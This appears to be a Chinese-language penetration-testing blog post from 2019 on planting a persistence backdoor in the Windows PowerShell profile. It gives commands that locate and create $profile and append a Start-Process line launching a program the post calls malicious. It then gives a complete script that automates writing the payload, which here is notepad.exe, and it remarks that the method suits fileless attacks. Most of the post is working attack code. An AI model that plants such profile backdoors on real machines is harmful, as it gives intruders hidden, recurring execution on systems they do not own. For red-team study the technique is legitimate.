Powershell配置文件-持久性后门
powershell配置文件后门,通过设置配置文件后门可以实现每次powershell启动时。执行指定的恶意操作
实验过程
echo $profile #输出配置文件的路径
Test-Path $profile #判断配置文件是否存在,如果返回为False代表不存在,返回True则存在
New-Item -Path $profile -Type File –Force #新建一个配置文件
$string = 'Start-Process "C:\tmp\pentestlab.exe"' #要启动的恶意程序
$string | Out-File -FilePath "C:\Users\<User>\Documents\WindowsPowerShell\Microsoft.PowerShe
ll_profile.ps1" -Append #写入配置文件
测试结果
自动写入的ps1脚本
Write-Host -NoNewline [*] New powershell config;
New-Item -Path $profile -Type File –Force;
$path=$profile;
Write-Host [*] config path: $path;
$sets=Test-Path $profile;
if($sets -eq "True"){
Write-Host [*] New config ok;
$payload='Start-Process "C:\Windows\System32\notepad.exe"'
$payload | Out-File -FilePath $path;
Write-Host [+] write powershell config ok !!!
}else{
Write-Host -NoNewline [-] New config False...;
exit(1);
}
当然你也可以用这个方法来实现无文件攻击
参考链接
Persistence – PowerShell Profile | Penetration Testing Lab
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:Powershell配置文件-持久性后门
本文作者:九世
发布时间:2019-11-07, 16:12:33
最后更新:2019-11-07, 16:47:41
原始链接:http://jiushill.github.io/posts/3327c145.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。